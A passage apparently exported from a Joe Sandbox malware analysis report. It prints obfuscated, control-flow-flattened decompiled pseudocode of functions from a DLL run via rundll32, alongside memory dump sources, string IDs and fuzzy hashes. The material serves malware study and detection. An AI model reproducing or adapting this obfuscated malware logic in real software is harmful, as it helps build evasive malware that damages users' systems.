                                                                        				_t272 = 0x31;
                                                                        				_v84 = _v84 * 0x39;
                                                                        				_v84 = _v84 * 0x73;
                                                                        				_v84 = _v84 ^ 0x0b6c29a9;
                                                                        				_v24 = 0x471e;
                                                                        				_v24 = _v24 | 0xb0cec10e;
                                                                        				_v24 = _v24 ^ 0xb0cea202;
                                                                        				_v44 = 0x7985;
                                                                        				_v44 = _v44 * 0x70;
                                                                        				_v44 = _v44 + 0xffff691b;
                                                                        				_v44 = _v44 ^ 0x003485fc;
                                                                        				_v80 = 0x185c;
                                                                        				_t273 = 0x5c;
                                                                        				_v80 = _v80 / _t272;
                                                                        				_v80 = _v80 | 0x649be726;
                                                                        				_v80 = _v80 + 0x7856;
                                                                        				_v80 = _v80 ^ 0x649c793b;
                                                                        				while(1) {
                                                                        					L1:
                                                                        					_t253 = 0xe31e6;
                                                                        					do {
                                                                        						while(_t305 != _t253) {
                                                                        							if(_t305 == 0x7c03eab) {
                                                                        								_t305 = 0x2ddc9b72;
                                                                        								continue;
                                                                        							} else {
                                                                        								if(_t305 == 0x152cdf9c) {
                                                                        									_push(0x10001080);
                                                                        									_push(_v108);
                                                                        									_t256 = E1001BF25(_v104, _v40, __eflags);
                                                                        									_pop(_t279);
                                                                        									__eflags = E10013659(_v92, _v64, _v68, _v96, _v72, _t279,  &_v20, _v36, _t279, _t279, _t256, _t279, _v76, _v100);
                                                                        									_t305 =  ==  ? 0xe31e6 : 0x7d7e766;
                                                                        									E1001C5F7(_v28, _v88, _v32, _v60, _t256);
                                                                        									_t309 =  &(_t309[0x10]);
                                                                        									L16:
                                                                        									_t253 = 0xe31e6;
                                                                        									_t273 = 0x5c;
                                                                        									goto L17;
                                                                        								} else {
                                                                        									if(_t305 == 0x2ddc9b72) {
                                                                        										_t264 =  *0x100221b0 + 0x10;
                                                                        										while(1) {
                                                                        											__eflags =  *_t264 - _t273;
                                                                        											if(__eflags == 0) {
                                                                        												break;
                                                                        											}
                                                                        											_t264 = _t264 + 2;
                                                                        											__eflags = _t264;
                                                                        										}
                                                                        										_t262 = _t264 + 2;
                                                                        										_t305 = 0x152cdf9c;
                                                                        										goto L1;
                                                                        									} else {
                                                                        										if(_t305 != 0x32e2c3ea) {
                                                                        											goto L17;
                                                                        										} else {
                                                                        											E10015483(_v24, _v44, _v80, _v20);
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							L8:
                                                                        							return _v16;
                                                                        						}
                                                                        						_t254 = E100079A2(_t262, _v48, _v52, _v56, _v84, _v20);
                                                                        						_t309 =  &(_t309[4]);
                                                                        						__eflags = _t254;
                                                                        						_t305 = 0x32e2c3ea;
                                                                        						_t225 = _t254 == 0;
                                                                        						__eflags = _t225;
                                                                        						_v16 = 0 | _t225;
                                                                        						goto L16;
                                                                        						L17:
                                                                        						__eflags = _t305 - 0x7d7e766;
                                                                        					} while (__eflags != 0);
                                                                        					goto L8;
                                                                        				}
                                                                        			}

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8y$@<$Vx$Y'}A$\m$a_$b[31$(
                                                                        • API String ID: 0-4115005019
                                                                        • Opcode ID: e2e8ff945d430b1b85599ee90a7361c4b7ac6e1ec00f878610a2fea6c08387fb
                                                                        • Instruction ID: 8b0e813e3e5c3b84958ad50093081c7edbab459e4345c4ad5d1788e5b52fe82d
                                                                        • Opcode Fuzzy Hash: e2e8ff945d430b1b85599ee90a7361c4b7ac6e1ec00f878610a2fea6c08387fb
                                                                        • Instruction Fuzzy Hash: 65B1FF715083409FE358CF25C98A90BBBE2FBC5748F10891DF1999A2A0D7B9DA498F46
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 98%
                                                                        			E10003D4E(intOrPtr __ecx, void* __edx) {
                                                                        				signed int _v4;
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				signed int _v48;
                                                                        				signed int _v52;
                                                                        				signed int _v56;
                                                                        				signed int _v60;
                                                                        				signed int _v64;
                                                                        				signed int _v68;
                                                                        				signed int _v72;
                                                                        				signed int _v76;
                                                                        				signed int _v80;
                                                                        				signed int _v84;
                                                                        				signed int _v88;
                                                                        				signed int _v92;
                                                                        				signed int _v96;
                                                                        				signed int _v100;
                                                                        				signed int _v104;
                                                                        				signed int _v108;
                                                                        				signed int _v112;
                                                                        				void* _t231;
                                                                        				intOrPtr _t232;
                                                                        				intOrPtr* _t233;
                                                                        				intOrPtr* _t236;
                                                                        				intOrPtr _t238;
                                                                        				intOrPtr* _t239;
                                                                        				intOrPtr _t243;
                                                                        				signed int _t245;
                                                                        				signed int _t246;
                                                                        				signed int _t247;
                                                                        				void* _t248;
                                                                        				intOrPtr* _t269;
                                                                        				void* _t270;
                                                                        				void* _t272;
                                                                        				signed int* _t273;
                                                                        
                                                                        				_t273 =  &_v112;
                                                                        				_v72 = 0x5582;
                                                                        				_v72 = _v72 >> 1;
                                                                        				_t272 = __edx;
                                                                        				_t243 = __ecx;
                                                                        				_t269 = 0;
                                                                        				_t245 = 0x51;
                                                                        				_v72 = _v72 / _t245;
                                                                        				_v72 = _v72 ^ 0x0000601c;
                                                                        				_t270 = 0x1322e1ec;
                                                                        				_v36 = 0xc7c9;
                                                                        				_v36 = _v36 | 0xbc8756ca;
                                                                        				_v36 = _v36 ^ 0xbc8791da;
                                                                        				_v56 = 0xdb25;
                                                                        				_v56 = _v56 + 0xa75d;
                                                                        				_v56 = _v56 ^ 0x0001a8e8;
                                                                        				_v112 = 0xc6db;
                                                                        				_v112 = _v112 >> 0xb;
                                                                        				_v112 = _v112 >> 0xd;
                                                                        				_v112 = _v112 + 0xd338;
                                                                        				_v112 = _v112 ^ 0x0000d633;
                                                                        				_v76 = 0xc37;
                                                                        				_v76 = _v76 >> 3;
                                                                        				_v76 = _v76 | 0xce4966ab;
                                                                        				_v76 = _v76 ^ 0xce4936b0;
                                                                        				_v108 = 0xb399;
                                                                        				_v108 = _v108 << 0x10;
                                                                        				_v108 = _v108 >> 1;
                                                                        				_v108 = _v108 | 0x0148f084;
                                                                        				_v108 = _v108 ^ 0x59ccb068;
                                                                        				_v80 = 0xaa79;
                                                                        				_v80 = _v80 + 0x2a7d;
                                                                        				_v80 = _v80 >> 5;
                                                                        				_v80 = _v80 ^ 0x0000706a;
                                                                        				_v52 = 0x1cb3;
                                                                        				_v52 = _v52 | 0xdfdf2f63;
                                                                        				_v52 = _v52 ^ 0xdfdf2d78;
                                                                        				_v40 = 0x2796;
                                                                        				_v40 = _v40 << 9;
                                                                        				_v40 = _v40 ^ 0x004f7581;
                                                                        				_v44 = 0x2f1a;
                                                                        				_t246 = 0x64;
                                                                        				_v44 = _v44 / _t246;
                                                                        				_v44 = _v44 ^ 0x0000485d;
                                                                        				_v48 = 0x187a;
                                                                        				_v48 = _v48 + 0x126d;
                                                                        				_v48 = _v48 ^ 0x000074b0;
                                                                        				_v104 = 0x9317;
                                                                        				_v104 = _v104 >> 8;
                                                                        				_v104 = _v104 << 5;
                                                                        				_v104 = _v104 + 0xe504;
                                                                        				_v104 = _v104 ^ 0x0000e32e;
                                                                        				_v100 = 0xf551;
                                                                        				_v100 = _v100 ^ 0x5a167e7d;
                                                                        				_v100 = _v100 >> 7;
                                                                        				_v100 = _v100 >> 0xe;
                                                                        				_v100 = _v100 ^ 0x00000292;
                                                                        				_v28 = 0x87ec;
                                                                        				_v28 = _v28 + 0xffffd24f;
                                                                        				_v28 = _v28 ^ 0x00002fae;
                                                                        				_v32 = 0x1a62;
                                                                        				_v32 = _v32 << 7;
                                                                        				_v32 = _v32 ^ 0x000d761f;
                                                                        				_v68 = 0x4d45;
                                                                        				_v68 = _v68 + 0xffff90af;
                                                                        				_v68 = _v68 >> 4;
                                                                        				_v68 = _v68 ^ 0x0fff89e8;
                                                                        				_v12 = 0x8a80;
                                                                        				_v12 = _v12 | 0x7f7c99ee;
                                                                        				_v12 = _v12 ^ 0x7f7cab2a;
                                                                        				_v16 = 0x19cc;
                                                                        				_v16 = _v16 + 0xffff6b5c;
                                                                        				_v16 = _v16 ^ 0xfffffdf7;
                                                                        				_v20 = 0x88ed;
                                                                        				_v20 = _v20 | 0x3d0cae91;
                                                                        				_v20 = _v20 ^ 0x3d0caeb7;
                                                                        				_v24 = 0xdb7;
                                                                        				_v24 = _v24 + 0xffffd9aa;
                                                                        				_v24 = _v24 ^ 0xffffae78;
                                                                        				_v96 = 0xd89d;
                                                                        				_v96 = _v96 ^ 0x4d812d2a;
                                                                        				_v96 = _v96 << 0xd;
                                                                        				_v96 = _v96 << 2;
                                                                        				_v96 = _v96 ^ 0xfadb9b11;
                                                                        				_v60 = 0x63dc;
                                                                        				_t247 = 0x73;
                                                                        				_v60 = _v60 * 0x5f;
                                                                        				_v60 = _v60 ^ 0x00257e00;
                                                                        				_v64 = 0xaca0;
                                                                        				_v64 = _v64 + 0x1639;
                                                                        				_v64 = _v64 ^ 0x0000d793;
                                                                        				_v84 = 0x1d64;
                                                                        				_v84 = _v84 * 0x49;
                                                                        				_v84 = _v84 + 0x2f18;
                                                                        				_v84 = _v84 ^ 0x0008f6d2;
                                                                        				_v4 = 0xa1b0;
                                                                        				_v4 = _v4 + 0xca2d;
                                                                        				_v4 = _v4 ^ 0x000177a9;
                                                                        				_v88 = 0xa1e4;
                                                                        				_v88 = _v88 >> 0xf;
                                                                        				_v88 = _v88 + 0x87da;
                                                                        				_v88 = _v88 << 7;
                                                                        				_v88 = _v88 ^ 0x0043e3cc;
                                                                        				_v8 = 0x4904;
                                                                        				_v8 = _v8 << 6;
                                                                        				_v8 = _v8 ^ 0x001263b3;
                                                                        				_v92 = 0x6a47;
                                                                        				_v92 = _v92 + 0xffffd61f;
                                                                        				_v92 = _v92 + 0xffffa4a6;
                                                                        				_v92 = _v92 / _t247;
                                                                        				_v92 = _v92 ^ 0x02399718;
                                                                        				while(1) {
                                                                        					L1:
                                                                        					_t231 = 0xbbd3b0e;
                                                                        					do {
                                                                        						L2:
                                                                        						while(_t270 != _t231) {
                                                                        							if(_t270 == 0x11fd89d0) {
                                                                        								_t247 = _v100;
                                                                        								_t233 = E10008997(_t247, _v28, _v32, _v68,  *_t269);
                                                                        								_t273 =  &(_t273[3]);
                                                                        								 *((intOrPtr*)(_t269 + 0x1c)) = _t233;
                                                                        								__eflags = _t233;
                                                                        								_t231 = 0xbbd3b0e;
                                                                        								_t270 =  !=  ? 0xbbd3b0e : 0x2e937f96;
                                                                        								continue;
                                                                        							}
                                                                        							if(_t270 != 0x1322e1ec) {
                                                                        								if(_t270 == 0x17e19405) {
                                                                        									return E100091CD(_v4, _v88, _v8, _t269, _v92);
                                                                        								}
                                                                        								if(_t270 == 0x25daab44) {
                                                                        									 *((intOrPtr*)(_t269 + 0x20)) = _t243;
                                                                        									_t238 =  *0x10021400; // 0x0
                                                                        									 *((intOrPtr*)(_t269 + 0x10)) = _t238;
                                                                        									 *0x10021400 = _t269;
                                                                        									return _t238;
                                                                        								}
                                                                        								if(_t270 == 0x29623426) {
                                                                        									_push(_v112);
                                                                        									_t239 = E10005BE1(_v56, _t272, __eflags, _t247);
                                                                        									 *_t269 = _t239;
                                                                        									_pop(_t247);
                                                                        									__eflags = _t239;
                                                                        									if(__eflags == 0) {
                                                                        										goto L10;
                                                                        									} else {
                                                                        										E100039D1(_v108, _v80,  *_t269, _v52, _t239);
                                                                        										_t247 = _v40;
                                                                        										E100056B3(_v44, _v48,  *_t269, _v104);
                                                                        										_t273 =  &(_t273[7]);
                                                                        										_t270 = 0x11fd89d0;
                                                                        										while(1) {
                                                                        											L1:
                                                                        											_t231 = 0xbbd3b0e;
                                                                        											goto L2;
                                                                        										}
                                                                        									}
                                                                        									goto L13;
                                                                        								} else {
                                                                        									if(_t270 != 0x2e937f96) {
                                                                        										goto L19;
                                                                        									} else {
                                                                        										E10018C8B(_v60, _v64, _v84,  *_t269);
                                                                        										_pop(_t247);
                                                                        										L10:
                                                                        										_t270 = 0x17e19405;
                                                                        										while(1) {
                                                                        											L1:
                                                                        											_t231 = 0xbbd3b0e;
                                                                        											goto L2;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								L23:
                                                                        								return _t236;
                                                                        							}
                                                                        							L13:
                                                                        							_t248 = 0x24;
                                                                        							_t236 = E100157E8(_t248);
                                                                        							_t269 = _t236;
                                                                        							_t247 = _t247;
                                                                        							__eflags = _t269;
                                                                        							if(__eflags != 0) {
                                                                        								_t270 = 0x29623426;
                                                                        								while(1) {
                                                                        									L1:
                                                                        									_t231 = 0xbbd3b0e;
                                                                        									goto L2;
                                                                        								}
                                                                        							}
                                                                        							goto L23;
                                                                        						}
                                                                        						_t247 = _v12;
                                                                        						_t232 = E1000D6D8(_t247, _v16, _t247, E10008816, _v20, _t247, _t269, _t247, _t247, _v24, _v96);
                                                                        						_t273 =  &(_t273[9]);
                                                                        						 *((intOrPtr*)(_t269 + 4)) = _t232;
                                                                        						__eflags = _t232;
                                                                        						if(__eflags == 0) {
                                                                        							_t270 = 0x2e937f96;
                                                                        							_t231 = 0xbbd3b0e;
                                                                        							goto L19;
                                                                        						} else {
                                                                        							_t270 = 0x25daab44;
                                                                        							goto L1;
                                                                        						}
                                                                        						goto L23;
                                                                        						L19:
                                                                        						__eflags = _t270 - 0x32655ae2;
                                                                        					} while (__eflags != 0);
                                                                        					return _t231;
                                                                        				}
                                                                        			}

                                                                        0x10003f3a
                                                                        0x10003f44
                                                                        0x10003f4c
                                                                        0x10003f54
                                                                        0x10003f5c
                                                                        0x10003f64
                                                                        0x10003f6c
                                                                        0x10003f74
                                                                        0x10003f7c
                                                                        0x10003f84
                                                                        0x10003f8c
                                                                        0x10003f94
                                                                        0x10003f99
                                                                        0x10003f9e
                                                                        0x10003fa6
                                                                        0x10003fb5
                                                                        0x10003fb6
                                                                        0x10003fba
                                                                        0x10003fc2
                                                                        0x10003fca
                                                                        0x10003fd2
                                                                        0x10003fda
                                                                        0x10003fe7
                                                                        0x10003feb
                                                                        0x10003ff3
                                                                        0x10003ffb
                                                                        0x10004003
                                                                        0x1000400b
                                                                        0x10004013
                                                                        0x1000401b
                                                                        0x10004020
                                                                        0x10004028
                                                                        0x1000402d
                                                                        0x10004035
                                                                        0x1000403d
                                                                        0x10004042
                                                                        0x1000404a
                                                                        0x10004052
                                                                        0x1000405a
                                                                        0x10004068
                                                                        0x1000406c
                                                                        0x10004074
                                                                        0x10004074
                                                                        0x10004074
                                                                        0x10004079
                                                                        0x00000000
                                                                        0x10004079
                                                                        0x10004087
                                                                        0x10004169
                                                                        0x1000416d
                                                                        0x10004172
                                                                        0x10004175
                                                                        0x10004178
                                                                        0x1000417f
                                                                        0x10004184
                                                                        0x00000000
                                                                        0x10004184
                                                                        0x10004093
                                                                        0x1000409f
                                                                        0x00000000
                                                                        0x10004213
                                                                        0x100040ab
                                                                        0x100041e4
                                                                        0x100041e7
                                                                        0x100041ec
                                                                        0x100041ef
                                                                        0x00000000
                                                                        0x100041ef
                                                                        0x100040b7
                                                                        0x100040e1
                                                                        0x100040ec
                                                                        0x100040f1
                                                                        0x100040f4
                                                                        0x100040f5
                                                                        0x100040f7
                                                                        0x00000000
                                                                        0x100040f9
                                                                        0x1000410c
                                                                        0x1000411f
                                                                        0x10004123
                                                                        0x10004128
                                                                        0x1000412b
                                                                        0x10004074
                                                                        0x10004074
                                                                        0x10004074
                                                                        0x00000000
                                                                        0x10004074
                                                                        0x10004074
                                                                        0x00000000
                                                                        0x100040b9
                                                                        0x100040bf
                                                                        0x00000000
                                                                        0x100040c5
                                                                        0x100040d3
                                                                        0x100040d9
                                                                        0x100040da
                                                                        0x100040da
                                                                        0x10004074
                                                                        0x10004074
                                                                        0x10004074
                                                                        0x00000000
                                                                        0x10004074
                                                                        0x10004074
                                                                        0x100040bf
                                                                        0x1000421d
                                                                        0x1000421d
                                                                        0x1000421d
                                                                        0x10004135
                                                                        0x10004140
                                                                        0x10004141
                                                                        0x10004146
                                                                        0x10004148
                                                                        0x10004149
                                                                        0x1000414b
                                                                        0x10004151
                                                                        0x10004074
                                                                        0x10004074
                                                                        0x10004074
                                                                        0x00000000
                                                                        0x10004074
                                                                        0x10004074
                                                                        0x00000000
                                                                        0x1000414b
                                                                        0x100041ac
                                                                        0x100041b3
                                                                        0x100041b8
                                                                        0x100041bb
                                                                        0x100041be
                                                                        0x100041c0
                                                                        0x100041cc
                                                                        0x100041d1
                                                                        0x00000000
                                                                        0x100041c2
                                                                        0x100041c2
                                                                        0x00000000
                                                                        0x100041c2
                                                                        0x00000000
                                                                        0x100041d6
                                                                        0x100041d6
                                                                        0x100041d6
                                                                        0x00000000
                                                                        0x10004079

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: &4b)$&4b)$.$EM$Gj$]H$jp$Ze2
                                                                        • API String ID: 0-3831357560
                                                                        • Opcode ID: fad2b6a6da34d5a79a599ec2a751447f4d4df015aa6644864e5b89069f857f56
                                                                        • Instruction ID: 8a5446e4f8035bc658c840a08d927aab7b0b9702947ac2468c43b6993038afce
                                                                        • Opcode Fuzzy Hash: fad2b6a6da34d5a79a599ec2a751447f4d4df015aa6644864e5b89069f857f56
                                                                        • Instruction Fuzzy Hash: 12C141B25083419BE354CF21C88944FBBE1FB94788F204A1DF595962A4E7B9D948CF87
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E1000704B() {
                                                                        				signed int _v4;
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				signed int _v48;
                                                                        				signed int _v52;
                                                                        				signed int _v56;
                                                                        				signed int _v60;
                                                                        				signed int _v64;
                                                                        				signed int _v68;
                                                                        				signed int _t185;
                                                                        				void* _t186;
                                                                        				signed int _t187;
                                                                        				void* _t193;
                                                                        				void* _t213;
                                                                        				void* _t218;
                                                                        				signed int _t219;
                                                                        				signed int _t220;
                                                                        				signed int _t221;
                                                                        				signed int _t222;
                                                                        				signed int _t223;
                                                                        				signed int _t224;
                                                                        				intOrPtr* _t226;
                                                                        				signed int _t227;
                                                                        				signed int* _t228;
                                                                        
                                                                        				_t228 =  &_v68;
                                                                        				_v60 = 0x1d43;
                                                                        				_v60 = _v60 << 0xc;
                                                                        				_t193 = 0x3977c092;
                                                                        				_v60 = _v60 + 0x28c6;
                                                                        				_v60 = _v60 ^ 0xdcba1064;
                                                                        				_v60 = _v60 ^ 0xdd6f48a2;
                                                                        				_v20 = 0xe9e;
                                                                        				_v20 = _v20 | 0x1058ed95;
                                                                        				_v20 = _v20 ^ 0x210197a0;
                                                                        				_v20 = _v20 ^ 0x31590bf2;
                                                                        				_v24 = 0x25e5;
                                                                        				_v24 = _v24 >> 0xa;
                                                                        				_v24 = _v24 >> 4;
                                                                        				_v24 = _v24 ^ 0x00002580;
                                                                        				_v28 = 0x30bc;
                                                                        				_v28 = _v28 | 0xe7a908b3;
                                                                        				_v28 = _v28 * 0x23;
                                                                        				_t218 = 0;
                                                                        				_v28 = _v28 ^ 0xac22ac2a;
                                                                        				_v56 = 0xe775;
                                                                        				_v56 = _v56 >> 5;
                                                                        				_v56 = _v56 + 0x1b94;
                                                                        				_v56 = _v56 << 6;
                                                                        				_v56 = _v56 ^ 0x0008bd00;
                                                                        				_v32 = 0xff32;
                                                                        				_v32 = _v32 >> 2;
                                                                        				_v32 = _v32 | 0xd7112a41;
                                                                        				_v32 = _v32 ^ 0xd7116591;
                                                                        				_v64 = 0x688b;
                                                                        				_v64 = _v64 + 0xadbd;
                                                                        				_v64 = _v64 + 0x2af1;
                                                                        				_v64 = _v64 + 0xffffcd5d;
                                                                        				_v64 = _v64 ^ 0x00013bdf;
                                                                        				_v68 = 0xd7fc;
                                                                        				_v68 = _v68 | 0x40cef50a;
                                                                        				_v68 = _v68 >> 2;
                                                                        				_v68 = _v68 << 5;
                                                                        				_v68 = _v68 ^ 0x0677a26b;
                                                                        				_v4 = 0x4a94;
                                                                        				_v4 = _v4 + 0xffffb7ad;
                                                                        				_v4 = _v4 ^ 0x00004a42;
                                                                        				_v8 = 0xf2c8;
                                                                        				_t219 = 0x70;
                                                                        				_v8 = _v8 / _t219;
                                                                        				_v8 = _v8 ^ 0x000043de;
                                                                        				_v36 = 0x586c;
                                                                        				_t220 = 0x3c;
                                                                        				_v36 = _v36 / _t220;
                                                                        				_v36 = _v36 >> 7;
                                                                        				_v36 = _v36 ^ 0x00005cc4;
                                                                        				_v12 = 0x23ea;
                                                                        				_v12 = _v12 + 0x3510;
                                                                        				_v12 = _v12 ^ 0x00007e07;
                                                                        				_v40 = 0xa101;
                                                                        				_v40 = _v40 << 0xd;
                                                                        				_v40 = _v40 + 0x4a49;
                                                                        				_t221 = 0x14;
                                                                        				_v40 = _v40 * 0xc;
                                                                        				_v40 = _v40 ^ 0xf184ff7e;
                                                                        				_v44 = 0xbfff;
                                                                        				_v44 = _v44 | 0x69fcb387;
                                                                        				_v44 = _v44 * 0x2d;
                                                                        				_v44 = _v44 / _t221;
                                                                        				_v44 = _v44 ^ 0x081251c3;
                                                                        				_v48 = 0xf126;
                                                                        				_t222 = 0x18;
                                                                        				_v48 = _v48 / _t222;
                                                                        				_v48 = _v48 << 1;
                                                                        				_t223 = 0x4c;
                                                                        				_t227 = _v4;
                                                                        				_v48 = _v48 / _t223;
                                                                        				_v48 = _v48 ^ 0x00005fbf;
                                                                        				_t192 = _v4;
                                                                        				_t224 = _v4;
                                                                        				_v16 = 0x73ee;
                                                                        				_v16 = _v16 << 0xc;
                                                                        				_v16 = _v16 * 0x45;
                                                                        				_v16 = _v16 ^ 0xf3f273d0;
                                                                        				_v52 = 0x98da;
                                                                        				_v52 = _v52 | 0x54ea2f47;
                                                                        				_v52 = _v52 + 0xc0b4;
                                                                        				_v52 = _v52 << 9;
                                                                        				_v52 = _v52 ^ 0xd70e263f;
                                                                        				while(1) {
                                                                        					L1:
                                                                        					_t213 = 0x5c;
                                                                        					while(1) {
                                                                        						L2:
                                                                        						do {
                                                                        							L3:
                                                                        							while(_t193 != 0x1e3c7a) {
                                                                        								if(_t193 == 0x1cae070b) {
                                                                        									_t187 = E10017C1D(_v28, _v56, _t192, _t224, _v60, _v32);
                                                                        									_t228 =  &(_t228[4]);
                                                                        									_t227 = _t187;
                                                                        									_t186 = 0x32ab8bb4;
                                                                        									_t193 =  !=  ? 0x32ab8bb4 : 0x242cd2c8;
                                                                        									_t213 = 0x5c;
                                                                        									continue;
                                                                        								} else {
                                                                        									if(_t193 == 0x242cd2c8) {
                                                                        										E1001F23C(_v40, _t192, _v44, _v48, _v16);
                                                                        									} else {
                                                                        										if(_t193 == _t186) {
                                                                        											E10013C8B(_t227, _v64, _v68);
                                                                        											_t218 =  !=  ? 1 : _t218;
                                                                        											_t193 = 0x3667c679;
                                                                        											while(1) {
                                                                        												L1:
                                                                        												_t213 = 0x5c;
                                                                        												goto L2;
                                                                        											}
                                                                        										} else {
                                                                        											if(_t193 == 0x336046fa) {
                                                                        												_t226 =  *0x100221b0 + 0x10;
                                                                        												while( *_t226 != _t213) {
                                                                        													_t226 = _t226 + 2;
                                                                        												}
                                                                        												_t224 = _t226 + 2;
                                                                        												_t193 = 0x1e3c7a;
                                                                        												goto L2;
                                                                        											} else {
                                                                        												if(_t193 == 0x3667c679) {
                                                                        													E1001F23C(_v4, _t227, _v8, _v36, _v12);
                                                                        													_t228 =  &(_t228[3]);
                                                                        													_t193 = 0x242cd2c8;
                                                                        													while(1) {
                                                                        														L1:
                                                                        														_t213 = 0x5c;
                                                                        														L2:
                                                                        														goto L3;
                                                                        													}
                                                                        												} else {
                                                                        													if(_t193 != 0x3977c092) {
                                                                        														goto L21;
                                                                        													} else {
                                                                        														_t193 = 0x336046fa;
                                                                        														continue;
                                                                        													}
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								L24:
                                                                        								return _t218;
                                                                        							}
                                                                        							_t185 = E1000DA66(_v52, _t213, _v20, _t193, _v24);
                                                                        							_t192 = _t185;
                                                                        							_t228 =  &(_t228[3]);
                                                                        							if(_t185 == 0) {
                                                                        								_t193 = 0x2f5bcc41;
                                                                        								_t186 = 0x32ab8bb4;
                                                                        								_t213 = 0x5c;
                                                                        								goto L21;
                                                                        							} else {
                                                                        								_t193 = 0x1cae070b;
                                                                        								goto L1;
                                                                        							}
                                                                        							goto L24;
                                                                        							L21:
                                                                        						} while (_t193 != 0x2f5bcc41);
                                                                        						goto L24;
                                                                        					}
                                                                        				}
                                                                        			}


                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BJ$G/T$IJ$lX$u$#$%$s
                                                                        • API String ID: 0-3663283382
                                                                        • Opcode ID: 68cc132da59532e028890120555b8f8cf8d3ca96860295649d235a9d2345430b
                                                                        • Instruction ID: 8abdfc3377e969d007f48d575ba9e8df293e221e8c990af46830db3dd983c89b
                                                                        • Opcode Fuzzy Hash: 68cc132da59532e028890120555b8f8cf8d3ca96860295649d235a9d2345430b
                                                                        • Instruction Fuzzy Hash: 849149719083419FE358CF21C58541FBBE1FBC4798F109A1DF98A962A0D7B9CA498F47
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 69%
                                                                        			E100142E2(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                        				char _v556;
                                                                        				signed int _v560;
                                                                        				signed int _v564;
                                                                        				signed int _v568;
                                                                        				signed int _v572;
                                                                        				signed int _v576;
                                                                        				signed int _v580;
                                                                        				unsigned int _v584;
                                                                        				signed int _v588;
                                                                        				signed int _v592;
                                                                        				signed int _v596;
                                                                        				signed int _v600;
                                                                        				signed int _v604;
                                                                        				signed int _v608;
                                                                        				signed int _v612;
                                                                        				void* __ecx;
                                                                        				void* _t140;
                                                                        				signed int _t160;
                                                                        				void* _t166;
                                                                        				void* _t188;
                                                                        				signed int _t189;
                                                                        				signed int _t190;
                                                                        				signed int _t191;
                                                                        				signed int _t192;
                                                                        				signed int* _t196;
                                                                        
                                                                        				_push(_a12);
                                                                        				_t188 = __edx;
                                                                        				_push(_a8);
                                                                        				_push(_a4);
                                                                        				_push(__edx);
                                                                        				E100056B2(_t140);
                                                                        				_v584 = 0x92ce;
                                                                        				_t196 =  &(( &_v612)[5]);
                                                                        				_v584 = _v584 >> 8;
                                                                        				_v584 = _v584 >> 5;
                                                                        				_t166 = 0x97b55c3;
                                                                        				_v584 = _v584 ^ 0x000049ba;
                                                                        				_v560 = 0xd753;
                                                                        				_v560 = _v560 << 0xc;
                                                                        				_v560 = _v560 ^ 0x0d754d3b;
                                                                        				_v564 = 0x7345;
                                                                        				_v564 = _v564 + 0xffffb630;
                                                                        				_v564 = _v564 ^ 0x0000444d;
                                                                        				_v580 = 0xc1d6;
                                                                        				_t189 = 0xd;
                                                                        				_v580 = _v580 * 0x72;
                                                                        				_v580 = _v580 >> 0xa;
                                                                        				_v580 = _v580 ^ 0x00004587;
                                                                        				_v604 = 0xf114;
                                                                        				_v604 = _v604 / _t189;
                                                                        				_v604 = _v604 >> 0xd;
                                                                        				_t190 = 0x7d;
                                                                        				_v604 = _v604 * 0x2d;
                                                                        				_v604 = _v604 ^ 0x00006087;
                                                                        				_v596 = 0x254a;
                                                                        				_v596 = _v596 >> 6;
                                                                        				_v596 = _v596 + 0xffff3bab;
                                                                        				_v596 = _v596 ^ 0x53fe3558;
                                                                        				_v596 = _v596 ^ 0xac01675f;
                                                                        				_v572 = 0x4b54;
                                                                        				_v572 = _v572 | 0x16c6d02e;
                                                                        				_v572 = _v572 ^ 0x16c6fd39;
                                                                        				_v612 = 0xa42e;
                                                                        				_v612 = _v612 / _t190;
                                                                        				_v612 = _v612 + 0xffff9850;
                                                                        				_t191 = 0x17;
                                                                        				_v612 = _v612 / _t191;
                                                                        				_v612 = _v612 ^ 0x0b214225;
                                                                        				_v588 = 0x5e84;
